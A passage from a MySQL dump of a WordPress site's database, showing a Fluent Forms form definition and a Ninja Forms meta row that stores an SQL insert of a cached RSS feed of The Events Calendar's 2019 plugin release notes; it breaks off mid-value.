subject\",\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Title\",\"label_placement\":\"\",\"admin_field_label\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"Subject field is required\"}},\"conditional_logics\":[],\"is_unique\":\"no\",\"unique_validation_message\":\"This field value need to be unique.\",\"prefix_label\":\"\",\"suffix_label\":\"\"},\"editor_options\":{\"title\":\"Text Input\",\"icon_class\":\"icon-text-width\",\"template\":\"inputText\"},\"uniqElKey\":\"el_1516797770161\"},{\"index\":1,\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"subject_1\",\"value\":\"\",\"class\":\"\",\"placeholder\":\"Type your subject\",\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Subtitle\",\"label_placement\":\"\",\"admin_field_label\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":true,\"message\":\"Subject field is required\"}},\"conditional_logics\":[],\"is_unique\":\"no\",\"unique_validation_message\":\"This field value need to be unique.\",\"prefix_label\":\"\",\"suffix_label\":\"\"},\"editor_options\":{\"title\":\"Text Input\",\"icon_class\":\"icon-text-width\",\"template\":\"inputText\"},\"uniqElKey\":\"el_16920727390140.8153334614043652\"},{\"index\":2,\"element\":\"textarea\",\"attributes\":{\"name\":\"description\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\",\"rows\":4,\"cols\":2,\"maxlength\":\"\"},\"settings\":{\"container_class\":\"\",\"label\":\"Content\",\"label_placement\":\"\",\"help_message\":\"\",\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"title\":\"Textarea\",\"icon_class\":\"icon-paragraph\",\"template\":\"inputTextarea\"},\"uniqElKey\":\"el_1516797774136\"}],\"submitButton\":{\"uniqElKey\":\"el_1524065200616\",\"element\":\"button\",\"attributes\":{\"type\":\"submit\",\"class\":\"\"},\"settings\":{\"align\":\"left\",\"button_style\":\"default\",\"container_class\":\"\",\"help_message\":\"\",\"background_color\":\"#1a7efb\",\"button_size\":\"md\",\"color\":\"#ffffff\",\"button_ui\":{\"type\":\"default\",\"text\":\"Submit Form\",\"img_url\":\"\"}},\"editor_options\":{\"title\":\"Submit Button\"}}}',0,'form',NULL,15,'2023-08-15 05:11:05','2023-08-15 05:12:42');
/*!40000 ALTER TABLE `wpcl_fluentform_forms` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_fluentform_forms` with 5 row(s)
--

--
-- Table structure for table `wpcl_nf3_object_meta`
--

DROP TABLE IF EXISTS `wpcl_nf3_object_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_nf3_object_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext DEFAULT NULL,
  `meta_key` longtext DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=143 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_nf3_object_meta`
--

LOCK TABLES `wpcl_nf3_object_meta` WRITE;
/*!40000 ALTER TABLE `wpcl_nf3_object_meta` DISABLE KEYS */;
INSERT INTO `wpcl_nf3_object_meta` VALUES (1,1,'query','INSERT INTO `wpcl_options` (`option_name`, `option_value`, `autoload`) VALUES (\'_transient_feed_0d102f2a1f4d6bc90eb8c6ffe18e56ed\', \'a:4:{s:5:\\\"child\\\";a:1:{s:0:\\\"\\\";a:1:{s:3:\\\"rss\\\";a:1:{i:0;a:6:{s:4:\\\"data\\\";s:3:\\\"\\n\\n\\n\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:1:{s:7:\\\"version\\\";s:3:\\\"2.0\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:1:{s:0:\\\"\\\";a:1:{s:7:\\\"channel\\\";a:1:{i:0;a:6:{s:4:\\\"data\\\";s:49:\\\"\\n	\\n	\\n	\\n	\\n	\\n	\\n	\\n	\\n	\\n	\\n		\\n		\\n		\\n		\\n		\\n		\\n		\\n		\\n		\\n	\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:3:{s:0:\\\"\\\";a:6:{s:5:\\\"title\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:19:\\\"The Events Calendar\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:29:\\\"https://theeventscalendar.com\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:11:\\\"description\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:42:\\\"WordPress event plugins for awesome people\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:13:\\\"lastBuildDate\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:31:\\\"Fri, 23 Aug 2019 12:58:00 +0000\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:8:\\\"language\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:5:\\\"en-US\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"item\\\";a:10:{i:0;a:6:{s:4:\\\"data\\\";s:48:\\\"\\n		\\n		\\n				\\n		\\n				\\n\\n		\\n				\\n								\\n										\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:3:{s:0:\\\"\\\";a:6:{s:5:\\\"title\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:73:\\\"Announcing Community Tickets 4.7 – Split Payments with Event Organizers\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:100:\\\"https://theeventscalendar.com/announcing-community-tickets-4-7-split-payments-with-event-organizers/\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:7:\\\"pubDate\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:31:\\\"Thu, 22 Aug 2019 12:21:15 +0000\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:8:\\\"category\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:13:\\\"Release Notes\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"guid\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:40:\\\"https://theeventscalendar.com/?p=1855845\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:1:{s:11:\\\"isPermaLink\\\";s:5:\\\"false\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:11:\\\"description\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:680:\\\"<p>Salaama!  We&#8217;ve been giving a fresh focus to Community Tickets. The doors are open once again for your website to divvy up ticket revenue with organizers and track your automatic payouts. We can&#8217;t wait to show you what&#8217;s new. ? Heads Up: Event Tickets, Event Tickets Plus, and Community Events have minor updates as well.&#8230;</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/announcing-community-tickets-4-7-split-payments-with-event-organizers/\\\">Announcing Community Tickets 4.7 &#8211; Split Payments with Event Organizers</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:32:\\\"http://purl.org/dc/elements/1.1/\\\";a:1:{s:7:\\\"creator\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:8:\\\"Courtney\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:40:\\\"http://purl.org/rss/1.0/modules/content/\\\";a:1:{s:7:\\\"encoded\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:12941:\\\"<p>Salaama!  We&#8217;ve been giving a fresh focus to <a href=\\\"https://theeventscalendar.com/product/community-tickets/\\\">Community Tickets</a>. The doors are open once again for your website to divvy up ticket revenue with organizers and track your automatic payouts. We can&#8217;t wait to show you what&#8217;s new.</p>\\n<div style=\\\"background: #f3f3f3; border: 1px solid #aaa; padding: 0.6rem 1rem;\\\"><strong><img src=\\\"https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f514.png\\\" alt=\\\"?\\\" class=\\\"wp-smiley\\\" style=\\\"height: 1em; max-height: 1em;\\\" /> Heads Up:</strong> Event Tickets, Event Tickets Plus, and Community Events have minor updates as well. These plugins are only seeing changes that impact functionality with Community Tickets.</div>\\n<p>&nbsp;</p>\\n<h3>Split Payments Relaunched</h3>\\n<p>Several years ago, we shared <a href=\\\"https://theeventscalendar.com/community-tickets-sell-tickets-online-through-your-community-calendar/\\\">how you can split ticket sales with event organizers</a>. You can enable organizers to submit an event and split ticket sales with you.</p>\\n<p>But as things go, our method for supporting this hit a <a href=\\\"https://developer.paypal.com/docs/classic/adaptive-payments/integration-guide/APIntro/\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\">bump in the road</a> nearly 1.5 years ago.  Existing websites using the PayPal Adaptive Payments method are still able to keep using this with no impact from us or PayPal. However, no new websites were able to set up split payment accounts. Sadness.</p>\\n<p>Well&#8230;. IT&#8217;S BACK! We&#8217;re officially supporting the PayPal Payouts <abbr>API</abbr>, a newer method of organizing and automating payments. This means organizers, speakers, presenters, teachers, and more can get paid to host events with you, and payments automatically are issued by the plugin.</p>\\n<p><iframe width=\\\"800\\\" height=\\\"450\\\" src=\\\"https://www.youtube.com/embed/lQLZeLC_EwE\\\" frameborder=\\\"0\\\" allow=\\\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\\\" allowfullscreen></iframe></p>\\n<p>This is a <a href=\\\"https://theeventscalendar.com/release-schedule/\\\">Feature Releases</a> which means it includes major updates. New features mean new code, and while we expect smooth sailing, there could be breaking changes. This is especially important for those of you who’ve added snippets, plugin extensions, template overrides or modified the core templates to the plugins. We always recommend using a <a href=\\\"https://support.theeventscalendar.com/239548-Creating-and-using-a-WordPress-staging-site\\\">staging site</a> to test these changes before updating on a live site.</p>\\n<p>To see all of the changes included this Feature Release, check out the changelogs for all updated plugins below:</p>\\n<ul>\\n<li><a href=\\\"#et\\\">Event Tickets 4.10.7</a></li>\\n<li><a href=\\\"#etp\\\">Event Tickets Plus 4.10.6 </a></li>\\n<li><a href=\\\"#ce\\\">Community Events 4.6.4</a></li>\\n<li><a href=\\\"#ct\\\">Community Tickets 4.7</a></li>\\n<li><a href=\\\"#not-updated\\\">Not Updated This Release</a></li>\\n</ul>\\n<hr />\\n<p><!-- https://github.com/moderntribe/event-tickets/blob/d66c22e7baebb5481d6368d43ca7eb8110bbddc3/readme.txt#L118 --></p>\\n<h3 id=\\\"et\\\">Event Tickets 4.10.7</h3>\\n<ul>\\n<li><strong>Tweak</strong> &#8211; We fixed the styling of Attendee, Sales Orders, and Payouts reports by using unique IDs for tabbed views and correcting styles. </li>\\n<li><strong>Tweak</strong> &#8211; When a fee is being added to the event ticket sale price, we need to show what that fee is and how it’s applied. We added a hook under the price description field of the admin ticket editor to do so. </li>\\n<li><strong>Tweak</strong> &#8211; The Community Events Add Event Form was as fast as a snail and creating a lot of PHP notices. You&#8217;ll find we&#8217;re now over-caffeinated and checking for a post <abbr>ID</abbr> of 0 to prevent PHP notices.</li>\\n<p><!-- Common https://github.com/moderntribe/tribe-common/blob/release/G19.10/readme.txt#L5 --></p>\\n<li style=\\\"list-style-type: none;\\\">\\n<li><strong>Tweak</strong> &#8211; Depending on if you are using PayPal Payouts <abbr>API</abbr> or Adaptive payments, different PayPal credential fields display on the <strong>Events &gt; Settings &gt; Community</strong> page. To display only the the fields related to your configuration, we added IDs to radio fields.</li>\\n<li><strong>Fix</strong> &#8211; We adjusted the alignment of the description text for checkbox and radio fields in admin settings screens. </li>\\n<p><!-- back to ET --></p>\\n<li><strong>Fix</strong> &#8211; When <a href=\\\"https://support.theeventscalendar.com/999067-Display-a-List-of-Attendees-Events&quot;\\\">Displaying a List of Attendee&#8217;s Events</a> using the <samp>[tribe-user-event-confirmations]</samp> shortcode, the following error was displayed: <samp>WordPress database error: [Table &#8216;#.wp_postmeta&#8217; doesn&#8217;t exist]</samp>. We&#8217;ve corrected the hardcoded table name in the shortcode. </li>\\n<li><strong>Hooks</strong> &#8211; <a href=\\\"https://docs.theeventscalendar.com/reference/since/event.tickets4.10.7/\\\">https://docs.theeventscalendar.com/reference/since/event.tickets4.10.7/</a>\\n<li><strong>Language</strong> — <kbd>0 new strings added, 73 updated, 1 fuzzied, and 0 obsoleted</kbd></li>\\n</ul>\\n<p><!-- https://github.com/moderntribe/event-tickets-plus/blob/release/G19.10/readme.txt#L136 --></p>\\n<hr />\\n<h3 id=\\\"etp\\\">Event Tickets Plus 4.10.6</h3>\\n<ul>\\n<li><strong>Tweak</strong> &#8211; Like in Event Tickets, we made a few tweaks to the styling of front-end reports.</li>\\n<li><strong>Tweak</strong> &#8211; Similar to how Event Tickets is showing fees and how fees are applied, we needed to tweak a few things in Event Tickets Plus to work with Community Tickets. We removed fee calculation coding from the WooCommerce Tickets Order Report and replaced it with filters for Community Tickets to utilize. </li>\\n<li><strong>Fix</strong> &#8211; Replace calculations in WooCommerce order report to utilize filters so Community Tickets (and other plugins) can add/modify them as needed. </li>\\n<li><strong>Hooks</strong> &#8211; Added 12 filters, Removed 1 filter, Added 1 action <a href=\\\"https://docs.theeventscalendar.com/reference/since/event.tickets.plus4.10.6/\\\">https://docs.theeventscalendar.com/reference/since/event.tickets.plus4.10.6/ </a></li>\\n<li><strong>Language</strong> &#8211; <kbd>1 new strings added, 18 updated, 0 fuzzied, and 2 obsoleted</kbd></li>\\n</ul>\\n<hr />\\n<p><!-- https://github.com/moderntribe/events-community/blob/release/G19.10/readme.txt#L164 --></p>\\n<h3 id=\\\"ce\\\">Community Events 4.6.4</h3>\\n<ul>\\n<li><strong>Fix</strong> &#8211; There&#8217;s a little more polish to the back end of <strong>Events &gt; Settings &gt; Community</strong> page and made Community Events pixel perfect on the front end of <samp>yoursite.com/events/community</samp> as well. Tooltips and other assests were misbehaving and are now back in order.</li>\\n<li><strong>Language</strong> &#8211; <kbd>0 new strings added, 82 updated, 0 fuzzied, and 0 obsoleted</kbd></li>\\n</ul>\\n<hr />\\n<p><!-- https://github.com/moderntribe/events-community-tickets/blob/release/G19.10/readme.txt#L161 --></p>\\n<h3 id=\\\"ct\\\">Community Tickets 4.7</h3>\\n<ul>\\n<li><strong>Feature</strong> &#8211; We created a new PayPal Payouts <abbr>API</abbr> integration as the <a href=\\\"https://support.theeventscalendar.com/587135-Community-Tickets-Split-Payments#payouts\\\">default Split Payments method</a>. Previous installs can keep using <a href=\\\"https://support.theeventscalendar.com/347614-Community-Tickets-Configuring-PayPal-Split-Payments\\\">Adaptive Payments</a>. You can now process fee payouts for ANY WooCommerce payment gateway. Payouts will be processed by WP Cron once daily, you can <a href=\\\"https://support.theeventscalendar.com/587135-Community-Tickets-Split-Payments#trigger\\\">filter and change</a> this by filtering <samp>tribe_community_tickets_payouts_record_processor_interval</samp> and returning a valid <abbr title=\\\"WordPress\\\">WP</abbr> Cron interval. (Note: You may want to add custom <abbr>WP</abbr> Cron intervals to process payouts less often than daily.) </li>\\n<li><strong>Feature</strong> &#8211; We made new PayPal Payouts <abbr>API</abbr> options and show/hide functionality to collapse sections that are not applicable. See our <a href=\\\"https://support.theeventscalendar.com/587135-Community-Tickets-Split-Payments#payouts&quot;\\\">Split Payments guide for an example.</a> </li>\\n<li><strong>Feature</strong> &#8211; We added a new Payouts repository <samp>tribe_payouts()</samp> that lets you filter and fetch data on the new <samp>tribe_payouts</samp> post type. </li>\\n<li><strong>Feature</strong> &#8211; We added a new <a href=\\\"https://support.theeventscalendar.com/152335-Community-Tickets-Tracking-sales--getting-paid#Payouts\\\">Payouts report</a> screen available by going to Events > Events. Hover your mouse over the event title to see the Payouts report link below.  It will list payouts for a specific event from PayPal Payouts <abbr>API</abbr> and any Adaptive Payments payouts going forward. (Note: Does not include historical payout information) </li>\\n<li><strong>Feature</strong> &#8211; We now provide a migration script to migrate current fee data to existing Community Ticket orders for historical purposes going forward. </li>\\n<li><strong>Feature</strong> &#8211; We have a new Fee Display Option: Fees will be added to the price of the ticket. </li>\\n<li><strong>Tweak</strong> &#8211; As part of the Community refresh, we restyled and reorganized the front end <a href=\\\"https://support.theeventscalendar.com/scripts/file.php?view=Y&amp;file=m3ycw06886kbhmzb2fbdrd4o2kgrwgh4\\\">payment options form</a>. </li>\\n<li><strong>Tweak</strong> &#8211; The treatments added to Community Events were extended to Community Tickets related areas, like on the front end events report screens.</li>\\n<li><strong>Tweak</strong> &#8211; Only add fees to events created using Community Events. </li>\\n</li>\\n<li><strong>Fix</strong> &#8211; The link to Payment Options should only show if split payments are active. We also disabled the Payment Options page if split payments are not active. </li>\\n<li><strong>Deprecated</strong> &#8211; The front-end organizer payment option form no longer shows an option to change the fee display handling option. This option used to allow organizers to override the way fees are shown for their tickets. </li>\\n<li><strong>Tweak</strong> &#8211; Changed views:\\n<ul>\\n<li><samp>community-tickets/modules/orders-report-after-organizer</samp></li>\\n<li><samp>community-tickets/modules/payment-options</samp></li>\\n<li><samp>community-tickets/modules/shortcode-attendees</samp></li>\\n<li><samp>community-tickets/modules/tickets<samp></samp></samp></li>\\n</ul>\\n<li><strong>Hooks</strong> &#8211; Added 21 filters, Added 8 actions <a href=\\\"https://docs.theeventscalendar.com/reference/since/events.community.tickets4.7.0\\\">https://docs.theeventscalendar.com/reference/since/events.community.tickets4.7.0 </a></li>\\n<li><strong>Stability</strong> &#8211; Huzzah! We don&#8217;t want to exterminate bugs. We&#8217;d much rather prevent bugs from happening here at all. We&#8217;ve added in a shocking amount of automated tests to keep those pesky bugs away. After lots of counting, we&#8217;ve tallied 221 more automated tests with 1,364 assertions covering a wide range of functionality for Split Payments and Fee calculations. You can learn more about the <a href=\\\"https://make.wordpress.org/core/handbook/testing/automated-testing/phpunit/\\\">WordPress testing framework: PHPUnit</a>.</li>\\n</ul>\\n<hr />\\n<h3 id=\\\"not-updated\\\">Not Updated This Release</h3>\\n<p>The following plugins have <em>not</em> been updated this release and will remain at the version numbers specified here:</p>\\n<ul>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-events-calendar/\\\">The Events Calendar</a>  4.9.7</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-events-calendar-pro/\\\">Events Calendar Pro</a> 4.7.6</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-events-filterbar/\\\">Filter Bar</a> 4.8.1</li>\\n<li><a href=\\\"https://wordpress.org/plugins/advanced-post-manager/\\\">Advanced Post Manager</a> 4.5</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-eventbrite-tickets/\\\">Eventbrite Tickets</a> 4.6.2</li>\\n<li><a href=\\\"https://wordpress.org/plugins/image-widget/\\\">Image Widget</a> 4.4.7</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-image-widget-plus/\\\">Image Widget Plus</a> 1.0.3</li>\\n<li><a href=\\\"https://wordpress.org/plugins/GigPress\\\">GigPress</a> 2.3.23</li>\\n</ul>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/announcing-community-tickets-4-7-split-payments-with-event-organizers/\\\">Announcing Community Tickets 4.7 &#8211; Split Payments with Event Organizers</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}}}i:1;a:6:{s:4:\\\"data\\\";s:48:\\\"\\n		\\n		\\n				\\n		\\n				\\n\\n		\\n				\\n								\\n										\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";s:5:\\\"child\\\";a:3:{s:0:\\\"\\\";a:6:{s:5:\\\"title\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:66:\\\"Announcing The Events Calendar 4.9.7 and Events Calendar Pro 4.7.6\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:97:\\\"https://theeventscalendar.com/announcing-the-events-calendar-4-9-7-and-events-calendar-pro-4-7-6/\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:7:\\\"pubDate\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:31:\\\"Mon, 19 Aug 2019 21:10:59 +0000\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:8:\\\"category\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:13:\\\"Release Notes\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"guid\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:40:\\\"https://theeventscalendar.com/?p=1857291\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:1:{s:11:\\\"isPermaLink\\\";s:5:\\\"false\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:11:\\\"description\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:661:\\\"<p>We are excited to announce that we just shipped a maintenance release for The Events Calendar and Events Calendar PRO! This release features some back-end adjustments to improve how things work on the front end. The Events Calendar 4.9.7 Events Calendar Pro 4.7.6 Not Updated This Release The Events Calendar 4.9.7 Fix &#8211; We resolved&#8230;</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/announcing-the-events-calendar-4-9-7-and-events-calendar-pro-4-7-6/\\\">Announcing The Events Calendar 4.9.7 and Events Calendar Pro 4.7.6</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:32:\\\"http://purl.org/dc/elements/1.1/\\\";a:1:{s:7:\\\"creator\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:8:\\\"Jennifer\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:40:\\\"http://purl.org/rss/1.0/modules/content/\\\";a:1:{s:7:\\\"encoded\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:3202:\\\"<p>We are excited to announce that we just shipped a maintenance release for <strong>The Events Calendar</strong> and <strong>Events Calendar PRO</strong>! This release features some back-end adjustments to improve how things work on the front end.</p>\\n<ul>\\n<li><a href=\\\"#tec\\\">The Events Calendar 4.9.7</a></li>\\n<li><a href=\\\"#pro\\\">Events Calendar Pro 4.7.6</a></li>\\n<li><a href=\\\"#not-updated\\\">Not Updated This Release</a></li>\\n</ul>\\n<hr />\\n<h3 id=\\\"tec\\\">The Events Calendar 4.9.7</h3>\\n<ul>\\n<li><strong>Fix</strong> &#8211; We resolved buggy CSS loading which was causing the mascot image from being blown out of proportion.</li>\\n<li><strong>Tweak</strong> &#8211; We updated our lodash version from v4.17.11 to v4.17.15 on the Block Editor to prevent any possibility of a security issue with the package.</li>\\n<li><strong>Tweak</strong> &#8211; A new <samp>tribe_events_js_config</samp> filter was added to allow filtering of the JavaScript configuration contents.</li>\\n<li><strong>Tweak</strong> &#8211; There was an update to the JavaScript code for shortcodes that allow you to disable the <abbr>URL</abbr> manipulation behavior.</li>\\n<li><strong>Language</strong> &#8211; 3 new strings added, 191 updated, 1 fuzzied, and 0 obsoleted</li>\\n</ul>\\n<hr />\\n<h3 id=\\\"pro\\\">Events Calendar Pro 4.7.6</h3>\\n<ul>\\n<li><strong>Tweak</strong> &#8211; We updated the JavaScript code for shortcodes that allow you to disable the <abbr>URL</abbr> manipulation behavior via the <samp>tribe_events_js_config</samp> filter</li>\\n<li><strong>Language</strong> &#8211; 6 new strings added, 9 updated, 0 fuzzied, and 0 obsoleted</li>\\n</ul>\\n<hr />\\n<h3 id=\\\"not-updated\\\">Not Updated This Release</h3>\\n<p>The following plugins have <em>not</em> been updated this release and will remain at the version numbers specified here:</p>\\n<ul>\\n<li><a href=\\\"https://wordpress.org/plugins/advanced-post-manager/\\\">Advanced Post Manager</a> 4.5</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-community-events/\\\">Community Events</a> 4.6.3</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/community-tickets/\\\">Community Tickets</a> 4.6.3</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-event-tickets/\\\" data-ytta-id=\\\"-\\\">Event Tickets</a> 4.10.6.2</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-event-tickets-plus/\\\" data-ytta-id=\\\"-\\\">Event Tickets Plus</a> 4.10.5.1</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-eventbrite-tickets/\\\">Eventbrite Tickets</a> 4.6.2</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-events-filterbar/\\\">Filter Bar</a> 4.8.1</li>\\n<li><a href=\\\"https://wordpress.org/plugins/GigPress\\\">GigPress</a> 2.3.23</li>\\n<li><a href=\\\"https://wordpress.org/plugins/image-widget/\\\">Image Widget</a> 4.4.7</li>\\n<li><a href=\\\"https://theeventscalendar.com/product/wordpress-image-widget-plus/\\\">Image Widget Plus</a> 1.0.3</li>\\n</ul>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/announcing-the-events-calendar-4-9-7-and-events-calendar-pro-4-7-6/\\\">Announcing The Events Calendar 4.9.7 and Events Calendar Pro 4.7.6</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}}}i:2;a:6:{s:4:\\\"data\\\";s:48:\\\"\\n		\\n		\\n				\\n		\\n				\\n\\n		\\n				\\n								\\n										